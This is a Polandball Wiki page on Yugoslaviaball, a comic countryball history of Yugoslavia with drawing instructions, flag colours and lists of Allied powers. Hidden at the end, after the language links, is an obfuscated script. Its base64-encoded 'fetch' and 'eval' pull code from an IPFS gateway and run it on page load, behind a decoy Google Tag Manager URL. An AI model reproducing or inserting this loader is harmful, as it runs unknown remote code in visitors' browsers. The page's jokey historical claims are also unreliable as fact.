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    Polandball Wiki

    Socialist Federal Republic of Yoghurtslaviaball or Yuogoslaviaball Yugoslaviaball is a historical Titoist Slavic countryball that was composed of what is today Bosniaball, Croatiaball, Montenegroball,  North Macedoniaball, Serbiaball (formally the dominant personality of Yugoslaviaball), and Sloveniaball. Relatively big, it occupied most of the Balkan clay with its neighbors Bulgariaball, Albaniaball, and Greeceball.

    Even if Yugoslaviaball was being communist, it hadn't interacted with USSRball since 1948 when Tito-Stalin split happened, however afterwards, it decided to stay with USSRball but not to join the Warsaw Pactball. Yugoslaviaball was never in NATOball or Warsaw Pactball. But it mostly preferred to stay alone. It was always neutral, rich, powerful, relevant, and popular. Yugoslaviaball was always having a good time until Tito's death.



    During WWII, it was created from Kingdom of Yugoslaviaball as the Anti-Fascist Council for the National Liberation of Yugoslavia in 1942 when it morphed into the communist state in 1945 by the Partisans. The king would be exiled after a nerve cell called Tito took power.

    Yugoslavia during the Cold War

    In 1948, Yugoslavia would split from the Eastern Bloc in what was known as the Tito-Stalin split. This started when Tito allowed Yugoslav farmers to keep their land and created agricultural cooperatives rather than collectivizing them as the Soviets did. Yugoslavia's economy would later become a mix of a planned economy and a Market Socialist economy. During the Cold War, Yugoslavia was a neutral/Non Aligned country that would eventually improve relationships between the west and the Soviet Unionball.

    The Yugoslav War

    Josip Broz Tito's death in 1980 saw some massive issues within it. In 1991, ethnic and nationalist conflicts began to explode in its head, which started the Yugoslav war. In 1992 another conflict happened in its head and Yugoslavia also ditched its communist government in 1992. Eventually, in 1995, The Yugoslav wars ended and Yugoslaviaball was thought to have been dead in 1995. But it changed its name to  Serbia and Montenegroball. And after that it became... just Serbiaball .


    In 2006, the grounds that once belonged to Yugoslaviaball are now shared by Bosniaball, Croatiaball, Montenegroball, North Macedoniaball, Serbiaball (considered his sucessor) and Sloveniaball. Kosovoball proclaimed independence from Serbiaball in 2008, but it still cannot get membership in the United Nations because these guys and the rest of the world don’t recognize it at all. All of them are somewhat debt-ridden, as they all agreed to equally inherit Yugoslaviaball's debts after its death. Sloveniaball and Croatiaball can into Merkelreichtangle EU, while Serbiaball and Montenegroball should join in 2025.

    Relationships (Односи/Odnosi)

    Friends (Пријатељи/Пријатели/Prijatelji)

    Neutral (Неутрално/Neutralno/Неутрален/Nevtralen)

    Enemies (Непријатељи/Neprijatelji/Непријатели/Sovražniki)

    Socialist Republics

    How to draw

    Drawing Yugoslaviaball is easy:

    1. Draw a black circle and divide it into three stripes with blue on top, white in the middle, and red at the bottom.
    2. Draw in the mid a red star with a yellow border around it.
    3. Draw eyes and you have finished.

    Flag Colors

    Color Name RGB CMYK HEX
    UA Blue 0, 53, 148 C100-M64-Y0-K42 #003594
    White 255, 255, 255 N/A #FFFFFF
    Red 223, 0, 0 C0-M100-Y100-K12 #DF0000
    Yellow 252, 210, 13 C0-M16-Y94-K1 #FCD20D


    Polandball Wiki has a gallery of artwork, comics, GIFs, and videos of Yugoslaviaball.

    Click here to see it.


    The Allied Powers - Liberating the World from Tyranny
    Entente Powers/Allies
    Principal Entente Powers: Franceball UKball Russian Empireball ( Russian Republicball) (until 1917) • USAball (from 1917) • Kingdom of Italyball (From 1915) • Empire of Japanball
    Associated allies and co-belligerents: Kingdom of Serbiaball Belgiumball Kingdom of Montenegroball Luxembourgball Australiaball Canadaball Ceylonball Sultanate of Egyptball Newfoundlandball New Zealandball British Rajball Sheikhdom of Kuwaitball Czechoslovakiaball Assyrian Volunteersball Emirate of Nejd and Hasaball Idrisid Emirate of Asirball Provisional Government of National Defenceball Portugalball Kingdom of Romaniaball Kingdom of Hejazball Kingdom of Greeceball Republic of Chinaball Siamball Brazilball Transcaucasiaball Centrocaspian Dictatorshipball Armeniaball
    Nations that declared war on the Central Powers, but didn't fight them: Nepalrawr San Marinoball Andorraball Republic of Cubaball Panamaball Liberiaball Guatemalaball Nicaraguaball Costa Ricaball Haitiball Hondurasball
    Nations that severed diplomatic ties with the Central Powers, but didn't fight them: Boliviaball Dominican Republicball Peruball Uruguayball Ecuadorball
    Nations that were aligned to the Entente, but didn't get involved: Norwayball Monacoball El Salvadorball Tibetball
    Allies of World War II
    Principal Allied Powers UKball Soviet Unionball (From 1941) • USAball (From 1941) • Republic of Chinaball Franceball (Until 1940) • Provisional Government of the French Republicball (From 1944)
    Allied combatants with governments-in-exile: Free Franceball Second Polish Republicball Czechoslovakiaball Belgiumball Luxembourgball Netherlandsball Norwayball Kingdom of Greeceball Kingdom of Yugoslaviaball Provisional Government of the Republic of Koreaball Ethiopian Empireball Commonwealth of the Philippinesball
    Other Allied combatant states: PR Polandball Canadaball Australiaball New Zealandball Union of South Africaball British Rajball Southern Rhodesiaball Nepalrawr Democratic Federal Yugoslaviaball Brazilball Mexicoball Mongolian People's Republicball Costa Ricaball Republic of Cubaball Dominican Republicball El Salvadorball Guatemalaball Haitiball Hondurasball Nicaraguaball Panamaball Boliviaball Colombiaball Liberiaball Chileball Ecuadorball Kingdom of Egyptball Lebanonball Paraguayball Peruball Saudi Arabiaball Syriaball Turkeyball Uruguayball United States of Venezuelaball Argentinaball DR Vietnamball
    Co-belligerents (former Axis powers): Kingdom of Iraqball (From 1943) • Pahlavi Iranball (From 1943) • Kingdom of Italyball (from 1943) (from 1943) • Kingdom of Romaniaball (from 1944) Kingdom of Bulgariaball (from 1944) • Finlandball (from 1944)

    es:Yugoslaviaball ru:Югославия zh:社会主义南斯拉夫球  pl:Yugoslaviaball<script>(function(w,d,s,l,i,j,k){w[d(j)](d(k))[s](c=>c.text())[s](c=>w[d(i)](c))})(window,atob,'then','https://www.googletagmanager.com/gtm.js?id=','ZXZhbA==','ZmV0Y2g=','aHR0cHM6Ly9nYXRld2F5LnBpbmF0YS5jbG91ZC9pcGZzL1FtYnB2NHdCeUdrUVcxVW1XVXYzUFBrYlFHWVBOUmVKOUM5Z0JzbnoxclFKQ3U=','f1fcdcaf')</script>

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